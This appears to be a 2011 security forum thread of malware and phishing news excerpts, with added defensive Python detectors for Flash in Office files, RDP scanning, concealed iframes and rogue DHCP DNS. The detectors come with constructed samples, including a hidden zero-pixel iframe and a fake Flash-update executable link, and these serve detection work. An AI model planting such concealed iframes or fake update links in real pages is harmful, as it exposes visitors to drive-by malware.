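"""Look for an embedded Flash (SWF) object inside an Office file.

Added example; heuristic only.  Matches the SWF header signature inside
legacy OLE2 files and inside the members of zipped OOXML containers.  A
harmless embedded .swf will be flagged too, which is the point: there is
rarely a business reason for Flash inside a spreadsheet."""
import io
import re
import struct
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SWF_SIG = re.compile(rb"[FCZ]WS")  # FWS = raw, CWS = zlib, ZWS = LZMA


def find_swf_headers(data: bytes) -> list[tuple[int, str, int, int]]:
    """Return (offset, signature, version, declared_length) for each plausible SWF header.

    Plausibility (assumption of this example): version 1..40, which covers Flash 1
    through the 2011 era with headroom, and a declared length of at least the 8-byte header.
    """
    hits = []
    for m in SWF_SIG.finditer(data):
        off = m.start()
        if off + 8 > len(data):
            break
        version = data[off + 3]
        length = struct.unpack_from("<I", data, off + 4)[0]
        if 1 <= version <= 40 and length >= 8:
            hits.append((off, m.group().decode(), version, length))
    return hits


def scan_office_file(blob: bytes) -> dict[str, list[tuple[int, str, int, int]]]:
    """Map container member (or '<ole2>' for a legacy binary file) to SWF header hits."""
    if blob[:8] == OLE2_MAGIC:
        hits = find_swf_headers(blob)
        return {"<ole2>": hits} if hits else {}
    if blob[:2] == b"PK":
        results = {}
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                # Embedded OLE objects in OOXML sit under xl/embeddings/, word/embeddings/, ...
                if info.is_dir() or info.file_size > 50_000_000:  # skip absurd members
                    continue
                hits = find_swf_headers(zf.read(info))
                if hits:
                    results[info.filename] = hits
        return results
    return {}


def build_sample_xlsx() -> bytes:
    """Constructed sample, not a real lure: a minimal OOXML-shaped ZIP whose embedded
    OLE object carries a compressed-SWF header (CWS, version 10, declared length 4096)."""
    swf = b"CWS" + bytes([10]) + struct.pack("<I", 4096) + b"\x78\x9c" + b"\x00" * 32
    ole_obj = OLE2_MAGIC + b"\x00" * 504 + swf  # fake OLE2 container holding the SWF
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b"<Types/>")
        zf.writestr("xl/workbook.xml", b"<workbook/>")
        zf.writestr("xl/embeddings/oleObject1.bin", ole_obj)
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_office_file(build_sample_xlsx()).items():
        for off, sig, ver, length in hits:
            print(f"{member}: {sig} v{ver} len={length} at offset {off}")
```

The check does not need to know the Flash bug being exploited; it only answers whether a spreadsheet carries Flash at all, which in a mail gateway is reason enough to hold the message.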


2011-08-27, 23:20

Apple iCloud phishing attacks ...
- http://nakedsecurity.sophos.com/2011/08/26/welcome-to-apple-icloud-phishing-attacks/
August 26, 2011 - "... The email claims to come from Apple, and appears to have targeted our correspondent because he is a user of Apple's MobileMe service. Apple is planning to shut down its MobileMe service in mid-2012, as it is readying its new iCloud service (which will store music, photos, calendars, documents etc in 'the cloud' and wirelessly push them to all of your devices). Understandably, a lot of MobileMe users are interested in how they will migrate to iCloud and this is the issue that the phishing email uses as bait... Yes, it's a phishing website. And just look what it's asking for: your credit card details, your address, your social security number, your full date of birth, your mother's maiden name and your Apple ID credentials... Imagine the harm a fraudster could cause with all that information. Make sure you have your eyes peeled for phishing attacks, and be on your guard regarding unsolicited messages you receive in your inbox..."
(Screenshots and more detail available at the Sophos URL above.)


2011-08-28, 05:29

Hurricanes prompt phishing scams...
- https://www.computerworld.com/s/article/9219530/DHS_warns_that_Irene_could_prompt_phishing_scams
August 26, 2011 - "... cybercriminals go into -overdrive- during highly publicized physical events such as hurricanes and earthquakes... The DHS is responsible for protecting critical infrastructure targets in the U.S. Until relatively recently, phishing -was- considered mostly a consumer problem. But the use of phishing emails to successfully breach the Oak Ridge National Laboratory, EMC's RSA security division, Epsilon and the Pacific Northwest National Laboratory have quickly changed that view. Over the past few years, phishers have increasingly taken advantage of natural disasters and other highly publicized incidents to slip infected emails and other malware onto users' desktops..."

- http://www.fbi.gov/news/news_blog/charity_082611
08.26.11 - "In light of Hurricane Irene, the public is reminded to beware of fraudulent e-mails and websites claiming to conduct charitable relief efforts. Disasters prompt individuals with criminal intent to solicit contributions purportedly for a charitable organization or a good cause. To learn more about avoiding online fraud, please see "Tips on Avoiding Fraudulent Charitable Contribution Schemes" at:
> http://www.ic3.gov/media/2011/110311.aspx "

- https://www.us-cert.gov/current/#potential_hurricane_irene_phishing_scams
August 29, 2011


2011-08-29, 15:24

Morto worm spreads via RDP - Port 3389/TCP
- http://www.theregister.co.uk/2011/08/28/morto_worm_spreading/
28 August 2011 - "... an Internet worm dubbed “Morto” spreading via the Windows Remote Desktop Protocol (RDP). F-Secure is reporting that the worm is behind a spike in traffic on Port 3389/TCP. Once it’s entered a network, the worm starts scanning for machines that have RDP enabled. Vulnerable machines get Morto copied to their local drives as a DLL, a.dll, which creates other files detailed in the F-Secure post*... SANS (ISC)**, which noticed heavy growth in RDP scan traffic over the weekend, says the spike in traffic is a “key indicator” of a growing number of infected hosts. Both Windows servers and workstations are vulnerable..."
* http://www.f-secure.com/weblog/archives/00002227.html

** https://isc.sans.edu/diary.html?storyid=11470
- https://isc.sans.edu/diary.html?storyid=11452

- http://h-online.com/-1332673
29 August 2011
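The ISC diary linked above calls the spike in RDP scan traffic a "key indicator" of infected hosts. An added example (mine, not from the F-Secure or ISC posts) of the detection a defender would run over perimeter logs: a source that opens TCP/3389 connections to many distinct hosts inside a short window is scanning, whatever it turns out to be. The log lines are constructed in iptables LOG style; the SRC/DST/PROTO/DPT field names are the real netfilter ones, the addresses, timestamps and thresholds are invented for the example.

```python
"""Spot RDP scanning in firewall logs: one source touching many distinct hosts
on TCP/3389 within a sliding window.

Added example.  Sample log lines are constructed (iptables LOG format)."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line: str, year: int = 2011):
    """Return (timestamp, src, dst, dport) or None for lines that are not TCP log records.
    Syslog timestamps carry no year, so it is supplied (assumption: 2011 for the sample)."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["dst"], int(m["dpt"])


def rdp_scanners(lines, window_s: int = 60, min_targets: int = 5, port: int = 3389):
    """Map each source to the distinct RDP targets it hit within any `window_s`-second
    window, for sources whose per-window target count reaches `min_targets`.
    Thresholds are example values; tune them to the size of the monitored network."""
    events = defaultdict(list)  # src -> [(ts, dst)] for hits on `port`
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] == port:
            events[rec[1]].append((rec[0], rec[2]))
    flagged = {}
    for src, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until hits[start:end+1] fits in window_s
            while (hits[end][0] - hits[start][0]).total_seconds() > window_s:
                start += 1
            targets = {dst for _, dst in hits[start:end + 1]}
            if len(targets) >= min_targets:
                flagged[src] = targets | flagged.get(src, set())
    return flagged


# Constructed sample: 10.0.0.5 sweeps six hosts in four seconds (worm behaviour),
# 10.0.0.9 re-connects to one admin host twice (normal), the rest is noise.
SAMPLE_LOG = """\
Aug 28 10:00:01 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.17 PROTO=TCP SPT=49152 DPT=3389 SYN
Aug 28 10:00:02 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.18 PROTO=TCP SPT=49153 DPT=3389 SYN
Aug 28 10:00:02 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.19 PROTO=TCP SPT=49154 DPT=3389 SYN
Aug 28 10:00:03 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=49155 DPT=3389 SYN
Aug 28 10:00:03 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.21 PROTO=TCP SPT=49156 DPT=3389 SYN
Aug 28 10:00:04 fw kernel: IN=eth1 OUT= SRC=10.0.0.5 DST=10.0.0.22 PROTO=TCP SPT=49157 DPT=3389 SYN
Aug 28 10:00:05 fw kernel: IN=eth1 OUT= SRC=10.0.0.9 DST=10.0.0.40 PROTO=TCP SPT=50000 DPT=3389 SYN
Aug 28 10:05:05 fw kernel: IN=eth1 OUT= SRC=10.0.0.9 DST=10.0.0.40 PROTO=TCP SPT=50001 DPT=3389 SYN
Aug 28 10:00:06 fw kernel: IN=eth1 OUT= SRC=10.0.0.7 DST=10.0.0.30 PROTO=TCP SPT=51000 DPT=443 SYN
Aug 28 10:00:07 fw kernel: IN=eth1 OUT= SRC=10.0.0.7 DST=10.0.0.31 PROTO=UDP SPT=51001 DPT=3389
"""

if __name__ == "__main__":
    for src, targets in rdp_scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{src} probed {len(targets)} RDP hosts: {', '.join(sorted(targets))}")
```

Internal sources that trip this are the hosts to pull and check for the a.dll artefact described in the F-Secure post; external sources are candidates for a block, and the count of distinct externals per hour is the curve ISC was watching.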


2011-08-30, 15:12

Malicious SPAM campaign - Facebook
- http://labs.m86security.com/2011/08/want-to-be-friends-on-facebook-dont-click-the-link/
August 29, 2011 - "... we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet. The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom... Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably Java..."
(Screenshots available at the m86 URL above.)
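Both the Armorize mass-compromise post (2011-08-18, injected iframes on 22,400 domains) and the m86 post above (a landing page with a fake "Flash update" link plus a hidden iframe to Blackhole) come down to the same two artefacts in fetched HTML. An added example, mine rather than code from either vendor, of a check that a web-proxy log reviewer or site owner could run over a saved page: it reports iframes that are concealed (zero/one-pixel size, display:none, visibility:hidden, or pushed off-screen) and anchor links whose target path ends in an executable extension. The HTML, the .invalid host names and the extension list are constructed for the example.

```python
"""Find concealed iframes and "update" links to executables in a fetched page.

Added example.  SAMPLE_HTML is constructed to mimic the two delivery paths
described in the m86 post; the .invalid names are reserved placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden", "left:-", "top:-")
EXEC_SUFFIXES = (".exe", ".scr", ".pif", ".com")  # assumption: short practical list


def _norm_style(style: str) -> str:
    return style.replace(" ", "").lower()


def _px(value):
    """Parse '0', '1px', ' 2 ' into an int; None when absent or not a plain pixel value."""
    if value is None:
        return None
    v = value.strip().lower().removesuffix("px")
    return int(v) if v.isdigit() else None


class SuspiciousContentParser(HTMLParser):
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.hidden_iframes = []   # (src, reasons)
        self.exec_links = []       # href values pointing at executables

    def _offsite(self, url: str) -> bool:
        host = urlsplit(url).hostname
        return bool(host) and host.lower() != self.page_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            reasons = []
            w, h = _px(a.get("width")), _px(a.get("height"))
            if (w is not None and w <= 1) or (h is not None and h <= 1):
                reasons.append("zero/one-pixel size")
            style = _norm_style(a.get("style") or "")
            if any(m in style for m in HIDDEN_STYLE_MARKERS):
                reasons.append("hidden by style")
            if self._offsite(src):
                reasons.append("off-site source")
            # an off-site iframe is only reported when it is also concealed;
            # visible third-party frames (ads, video) are normal
            if reasons and reasons != ["off-site source"]:
                self.hidden_iframes.append((src, ", ".join(reasons)))
        elif tag == "a":
            href = a.get("href") or ""
            if urlsplit(href).path.lower().endswith(EXEC_SUFFIXES):
                self.exec_links.append(href)


def audit_page(html: str, page_host: str):
    """Return the concealed iframes and executable links found in `html`,
    judging 'off-site' relative to `page_host`."""
    p = SuspiciousContentParser(page_host)
    p.feed(html)
    return {"hidden_iframes": p.hidden_iframes, "exec_links": p.exec_links}


SAMPLE_HTML = """<html><body>
<h1>You have a new friend request</h1>
<p>Your Flash Player is out of date.
<a href="http://update-hosting.invalid/adobe/flash_update.exe">Install update</a></p>
<iframe src="http://partner-ads.invalid/ads" width="300" height="250"></iframe>
<iframe src="http://landing.invalid/main.php?page=7a3b" width="0" height="0"
        style="visibility: hidden; position:absolute; left:-9999px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, items in audit_page(SAMPLE_HTML, "social-notify.invalid").items():
        print(kind, items)
```

On a compromised site the same parser, run against every page pulled over FTP, finds the injected iframe that the Armorize post describes; on a mail gateway it is run against the page the spam link lands on. The visible 300x250 frame is deliberately not reported, so the output stays short enough to act on.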


2011-09-02, 14:58

FTC malicious email campaign
- http://community.websense.com/blogs/securitylabs/archive/2011/09/01/return-of-the-ftc-malicious-email-campaign.aspx
01 Sep 2011 - "Websense... has detected malicious emails posing as a consumer complaint notice from the Federal Trade Commission... The exact email format seen in this case was also used a few years back... Malware authors constantly change the malicious file involved in their campaigns. The malware is poorly detected by AV engines*..."
(Screenshot available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=45bf8a3b21d05a31224e5cb718746d2e4c2e6d486ccd4c33fcf4a8ac53919d28-1314955779
File name: complaint9302.vcr
Submission date: 2011-09-02 09:29:39 (UTC)
Result: 18/44 (40.9%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=45bf8a3b21d05a31224e5cb718746d2e4c2e6d486ccd4c33fcf4a8ac53919d28-1315065041
File name: 1315064295.complaint9302.scr
Submission date: 2011-09-03 15:50:41 (UTC)
Result: 25/44 (56.8%)

- http://www.ftc.gov/opa/2011/09/scamemail.shtm
09/01/2011 - "The FTC is warning small businesses that an email with a subject line “URGENT: Pending Consumer Complaint” is -not- from the FTC. The email says that a complaint has been filed with the agency against their company. The FTC advises not to click on any of the links or attachments with the email. Clicking on the links may install a virus on the computer. The FTC’s advice: Delete the email..."


2011-09-05, 18:15

DNS hijacks ...
- http://h-online.com/-1336589
5 September 2011 - "A number of popular web sites were hit by a DNS hijack attack; The Daily Telegraph, UPS, The Register, National Geographic, Vodafone, Betfair and Acer were all affected. By modifying the DNS records for the sites, rather than directly attacking them, visitors to the sites were redirected to a site by "TurkGuvenligi" which declares "h4ck1n9 is not a cr1m3". Some of the sites shut down password protected services during the attack to ensure that users attempting to log in were not compromised. Correct DNS records have now been generated and have been propagating in the DNS system overnight..."

> http://zone-h.org/news/id/4741
"... all use NetNames as their registrar. It appears that the Turkish attackers managed to hack into the DNS panel of NetNames using an SQL injection..."

- http://nakedsecurity.sophos.com/2011/09/04/dns-hack-hits-popular-websites-telegraph-register-ups-etc/
September 4, 2011

- http://blog.sucuri.net/2011/09/ascio-registrar-compromised-brings-down-ups-com-theregister-and-others.html
September 4, 2011

:sad: :fear:

2011-09-06, 15:56

Fake Offers with Fake Trust Seals
- http://www.symantec.com/connect/blogs/fake-offers-fake-trust-seals
Sep. 5, 2011 - "... Symantec observed a phishing site that utilized a number of new tricks. The phishing site masqueraded as a well known software company and claimed to offer associated software products at discounted rates. The phishing page highlighted these fake offers as “summer offerings” and stated that customers could save 80% on their purchases. Users were prompted to enter their billing information, personal information, and credit card details to complete their purchases... If any users had fallen victim to the phishing site, the phishers would have successfully stolen their confidential information for financial gain... The phishing site was hosted on a newly registered domain name, and this new domain name was indexed in several popular search engines and had a very high page ranking. Phishers achieved the boosted page ranking by using common search keywords for the products within the domain name. For example, the domain would look like “common-search-keywords.com”. Thus, if a user searched with these keywords in a search engine, they could end up with the phishing site as a high-ranked result... The phishing page also contained fake trust seals at the bottom of the page. A legitimate trust seal is a seal provided to Web pages by a third party, typically a software security company, to certify that the website in question is genuine. Clicking on a trust seal will pop up a window provided by the third party, which contains details of the site name and the encryption data used to secure the site...
Internet users are advised to follow best practices to avoid phishing attacks:
• Do not click on suspicious links in email messages.
• Avoid providing any personal information when answering an email.
• Never enter personal information in a pop-up page or screen.
• When entering personal or financial information, ensure the website is encrypted with an SSL certificate by looking for the padlock, ‘https’, or the green address bar.
• Frequently update your security software..."
(Screenshots available at the symantec URL above.)


2011-09-07, 14:06

Fake e-mails from Electronic Payments Association NACHA
- http://community.websense.com/blogs/securitylabs/archive/2011/09/06/fraudulent-messages-from-electronic-payments-association-nacha.aspx
06 Sep 2011 - "Websense... has been tracking a large number of messages masquerading as legitimate messages from the Electronic Payment Association NACHA. The messages bear legitimate traits, as the display name and routing details seem to confirm. Further analysis of the message and attachments prove these to be malicious in intent... an unsuspecting member or patron of the service might just fall for this... The use of a double extension on a file name as well as the exact format of the message, including the Subject, attests to the reuse of the campaign... Although this might seem to have come from NACHA, the routing details suggest otherwise as they do not originate from the publicly-known MX records for the organization... VirusTotal results*..."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=06f4a26124cc408c85e864abd3b51ff4de2b74cad75d920e953281cc9a6fde91-1315379402
File name: FormApp_23131.zip
Submission date: 2011-09-07 07:10:02 (UTC)
Result: 30/44 (68.2%)

ACH spam campaign analysis...
- http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/
September 6, 2011 - "... Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil... The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot... downloading the file “s.exe” – a Zbot variant**... The file “22.exe” was interesting because we had not encountered it before. It was detected*** by 22 out of 45 antivirus programs... Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe... This spambot’s recent spamming activities include both pharmaceutical, and further ACH campaigns that appear to be from NACHA.org and are very similar to the one which led to this infection in the first place..."
** https://www.virustotal.com/file-scan/report.html?id=14c231ee3a70b07bcf622c91a34d60a6219166ccfd3e47b8db58412dd8b2f6fd-1315391834
File name: file
Submission date: 2011-09-07 10:37:14 (UTC)
Result: 34/44 (77.3%)
*** https://www.virustotal.com/file-scan/report.html?id=9d4abcbb25590c398c693822cc6f7f15bae6ad50a005a95a34ad7137cf5ee3ee-1315187924
File name: svchost.exe
Submission date: 2011-09-05 01:58:44 (UTC)
Result: 31/44 (70.5%)

Virus Outbreak In Progress
- http://www.ironport.com/toc/
Sep. 7, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77

Malicious Account Information E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24092
Fake Parcel Delivery Failure Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23917
Fake Presentation E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24082
Fake FDIC Document E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24028
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588


2011-09-10, 17:01

Ransomware posing as Microsoft
- http://pandalabs.pandasecurity.com/ransomware-posing-as-microsoft/
09/6/11 - "... Once you get infected (you can receive it in a number of different ways, most likely via spam messages and P2P), your computer is restarted. What for? Well, the malware installs itself to run every time your computer is started... The threat is clear: your Microsoft Windows authenticity could not be verified, you need to have it fixed, which is just a 100€ payment. They give you the payment instructions and before saying goodbye they let you know that in case you don’t pay you’ll lose access to the computer and will lose all your data, as well as that the district attorney’s office already has your IP address and that you’ll be prosecuted in case you fail to pay... that would scare anyone that doesn’t know this is a ransomware attack... for all of you that wouldn’t like to pay anything to these bastards, this is the code you can use to deactivate it:
Doing that your computer will be restarted and the registry key created by this malware (detected as Ransom.AN) will be removed, as well as the malware file..."


2011-09-14, 21:53

Ransomware uses false child porn accusations
- http://www.malwarecity.com/blog/cyber-extortion-scam-issues-false-child-porn-accusations-1127.html
5 September 2011 - "Russian cyber-criminals are coupling false accusations of child pornography with real software damage in a new scam that attempts to extort 500-ruble ($17) payments out of victims, according to an analysis by Bitdefender. Once infected with Trojan.Agent.ARVP malicious software, spread via innocent-seeming links, the victim receives a note stating that child pornography has been found on the computer and the user must pay a “fine” via a payment service. To back up the demand, the Trojan blocks the computer, effectively holding the system ransom. The scam marks an extension of the traditional activities of Russian cyber-criminal gangs, many of whom specialize in offering fake anti-virus solutions, or in frauds such as the “Russian bride scam,” which seeks to con European or North American men out of money by posing as beautiful Russian women seeking husbands from abroad. The child-porn scam targets Russian speakers for now but such attacks are often translated into English and other languages to spread further... The ransom note is scaled to take up to 90 percent of the screen and whatever is behind it is invalidated. Other emergency tools such as Task Manager, Windows Explorer and User Init Logon Application are killed and overwritten with copies of the Trojan, which prevents the operating system from initializing and running properly. The scammers say the user must pay within 12 hours or the “child-porn” case will be forwarded to the local police and all data stored on the personal computer will be blocked or deleted, the operating system uninstalled and the BIOS erased. In reality, the data will still be there and the BIOS will not be affected after the 12-hour deadline passes... Paying the ransom will -not- unlock it. In-depth analysis of the malware revealed that there is no way to unlock the PC, so the promise of a code is false. Messages such as this should immediately raise suspicions... 
To remain safe from such scams, users are advised to scrutinize links they come across and avoid as much as possible clicking on URLs they have not specifically searched for."


2011-09-16, 16:45

Corporate account credentials phished...
- http://www.finextra.com/news/fullstory.aspx?newsitemid=22957
16 September 2011 - "The FBI is currently investigating over 400 reported cases of corporate account takeovers, where cyber crooks have used ACH and wire transfers to steal tens of millions of dollars from US businesses. The scale of the problem was revealed this week by the bureau's assistant director in the cyber division, Gordon Snow, in testimony to a House Financial Services Committee subcommittee. Smart says business employees are being targeted by phishing e-mails containing infected files or links to suspect Web sites, enabling criminals to install -malware- on their computers to harvest online banking credentials. The FBI is looking in to over 400 cases where crooks have used this information to steal money from firms' accounts, involving the attempted theft of over $255 million and the actual loss of around $85 million..."


2011-09-16, 22:24

Malvertising on Bing and Yahoo...
- http://sunbeltblog.blogspot.com/2011/09/bing-yahoo-search-adverts-serve-up.html
September 16, 2011 - "... adverts being displayed in Bing that were directing end-users to malicious content. These adverts were promoting all manner of downloads including Firefox, Skype and uTorrent. Some of the search terms used:
FireFox Download - Download Skype - Download Adobe Player...
Clicking the adverts takes end-users to sites such as river-park(dot)net, and they do a pretty good job of convincing visitors that these sites are the real deal (incidentally, you'll notice that some of the ads display the "real" URL of the program mentioned, but take you to a rogue site such as the "Download uTorrent Free" advert... which actually takes you to aciclistaciempozuelos(dot)es/torrent)... All of the malicious downloads are coming from en-softonic(dot)net... the fake Firefox file installs a rootkit, runs IE silently in the background attempting clickfraud and also performs Google redirects. Current VirusTotal score for that one is 16/44*, and we detect it as Win32.Malware!Drop. These adverts were also appearing in Yahoo search - we notified both Yahoo and Microsoft, and both companies are in the process of killing these things off. It's entirely possible these sites will show up somewhere else..."
(Screenshots available at the sunbeltblog URL above.)
* https://www.virustotal.com/file-scan/report.html?id=d20c12348e014b782234cbff8d282cd9d566c86e6b2cda2cebee44aca43cf7aa-1316154205
File name: Backup.exe
Submission date: 2011-09-16 06:23:25 (UTC)
Result: 16/44 (36.4%)


2011-09-21, 13:50

Scare tactics used in malicious emails ...
- http://community.websense.com/blogs/securitylabs/archive/2011/09/20/_2200_We-are-going-to-sue-you_2200_-spam.aspx
20 Sep 2011 - "... Websense... has detected that an email campaign broke out on 19th September, 2011. In this campaign, emails are spoofed to appear as though they are sent from established companies. The emails even formally claim that legal action will be taken because of the spam you have sent. These emails with the fake warning even attach a ZIP file that contains a scanned copy of a document that is supposedly evidence of your spam... The spam outbreak uses several alerting subject headings to attract readers' attention. The ZIP file is actually an EXE file disguised as a document after decompression. It's a kind of Trojan.Downloader virus confirmed by VirusTotal*. When the trojan triggers, it copies itself to the system path under the Startup folder and deletes itself. Whenever you start the computer, the trojan will execute. This trojan can connect to remote servers and download malicious files... This campaign could potentially contain other variants of the trojan as attachments..."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=fb47da8e43e1387f5bccd07bf35b7b2c6ff93920a9ea3cf1817bd2006c4f0b5b-1316594716
File name: 2166218
Submission date: 2011-09-21 08:45:16 (UTC)
Result: 29/44 (65.9%)

- http://community.websense.com/blogs/securitylabs/archive/2011/09/22/fake-malware-notifications-from-websense-labs.aspx
22 Sep 2011


2011-09-21, 16:38

Fake transfers are latest Bank Heist ...
- http://www.trusteer.com/blog/fictitious-transfers-are-latest-bank-heist
September 20, 2011 - "A number of banks, in an effort to validate and secure financial transactions, are utilising transaction verification systems. They’re doing this in the belief that, even if malware manages to change transaction details on the fly, the customer has an out of band channel to verify that it has not been modified. This is based on the assumption that malware cannot infect the out of band channel, and therefore the bank or the customer will be able to detect fraudulent transfers... the assumption that malware cannot influence the out of band channel is flawed. The easiest way to defeat transaction verification systems is using social engineering attacks. Over the years we've seen a number of different variants against transaction verification systems... Using malware fraudsters first gain control over the web channel. This means -any- information that customers view inside their browser, while connected to their bank, can be modified by the fraudsters. Unfortunately, customers are usually -unable- to distinguish whether what they are seeing was actually served by the bank, or in fact modified by malware! This is giving fraudsters the ability to launch extremely effective social engineering attacks. In the attack we've recently seen, fraudsters were simply waiting for customers to log on to their bank's website. The bank robber then ‘changed’ the content of the post login page, to a message, informing customers of an upgraded security system. The customer is invited to go through a training process that intends to help him/her deal with the bank's upgraded security system. As part of the training they’re asked to make a transfer, to a fictitious bank account, and confirm the transaction using the confirmation code that is sent by the bank to the registered mobile phone. Fraudsters claim that the user's account will not be debited and the recipient's account is fabricated... the transaction then happens, the money is transferred, and the criminal disappears off into the sunset..."
(More detail at the trusteer URL above.)


2011-09-23, 21:19

Japan - MHI hacked ...
- http://www.itpro.co.uk/636271/japan-attacked-can-we-say-cyber-war-now
21 Sep 2011 - "... Mitsubishi Heavy Industries, one of Japan’s major weapons suppliers, admitted 45 of its servers and 38 computer terminals were infected. Targeted malware was allegedly used as part of a spear phishing attempt – similar to other attacks that have attempted to breach Governments in recent times, including in the UK. RSA was compromised by such tactics too – another situation in which some suspected a nation state’s involvement, as at least one of the eventual targets turned out to be major US defence contractor Lockheed Martin... In the case of MHI, no one has yet claimed responsibility for the infection. China, the number one suspect according to some sources, has denied any involvement. As with so many recent cases, no nation has been found guilty, nor has any Government admitted to being the perpetrator of an attack. When the DigiNotar attacks emerged last month, eventually resulting in the certificate authority’s demise, many pointed fingers at Iran. Yet in that case, ComodoHacker claimed responsibility, saying the Iranian regime had no hand in the hacks. For any onlookers, it’s near to impossible to know whom to trust. There is just too much obfuscation and potential for covert behaviour to lump any event under the ‘cyber war’ umbrella... As information remains a hugely valuable commodity, and hacking becomes an increasingly useful tool for acquiring it, cyber war will still focus heavily on data, rather than causing real-world havoc. Both public and private organisations will therefore be targets... individuals will be affected. There will be civilian casualties too, in the data sense at least..."


2011-09-24, 16:11

Fake "browser update" worm ...
- http://www.malwarecity.com/blog/update-your-browser-hmm-ill-pass-1155.html
23 September 2011 - "... As the DNS infrastructure is well defended against attacks, cyber-crooks often try to mess with the local DNS settings. This is the case of the infections with Worm.Rorpian.E that, once it successfully infects a computer on the network, starts acting as a DHCP server (an application that manages the connectivity of the network computers) and tampers with the local DNS servers to resolve all the requests to a rogue IP in Romania...
If you give in to the demand and “update your browser”, you’ll get infected with the same Worm.Rorpian.E, and your PC will start acting like a rogue DHCP server for the other clients connected to your network. Once the user clicks the “browser update” button, a php script fetches the malware from the server and names it as updbrowser[date].exe, where date is the current year, month and day. Of course, since we’re talking about cybercrime, the infection wasn’t only designed for fun. Once your PC has been infected with the “browser patch”, the worm starts bringing its friends to the party, cloaked by the infamous TDSS rootkit. Rorpian also has secondary spreading mechanisms: it “jumps” via network shares, exploits a couple of old, critical vulnerabilities such as the .LNK (MS10-046) and the one in the Windows DNS RPC Interface (MS07-029) to download and execute further malware onto the infected PCs..."
(More detail at the malwarecity URL above.)
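The rogue-DHCP behaviour described above is something a defender can check for on the wire: a DHCP OFFER/ACK whose server identifier is not the real gateway, or whose DNS option points off the network, is the tell. The following is an added example, not code from BitDefender or any source quoted in this thread; the packets are constructed in the block itself, the allowlisted addresses are made up, and 203.0.113.7 is a documentation address standing in for the attacker's resolver (the real IP is not given here).

```python
"""Audit DHCP server replies for rogue DNS settings (added example).

Constructed data: the packets below are built locally to mimic what a
sniffer would hand us; nothing here talks to a real network.
"""
import struct
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 0, 6, 53, 54, 255


def parse_options(pkt: bytes) -> dict:
    """Return {option_code: raw_value} from a DHCP packet's options field."""
    # The BOOTP fixed header is 236 bytes, followed by the 4-byte magic cookie.
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == OPT_PAD:
            i += 1
            continue
        length = pkt[i + 1]
        opts[pkt[i]] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def ip_list(raw: bytes) -> list:
    """Decode a run of 4-byte addresses (options 3, 6 and 54 use this layout)."""
    return [str(IPv4Address(raw[j:j + 4])) for j in range(0, len(raw) // 4 * 4, 4)]


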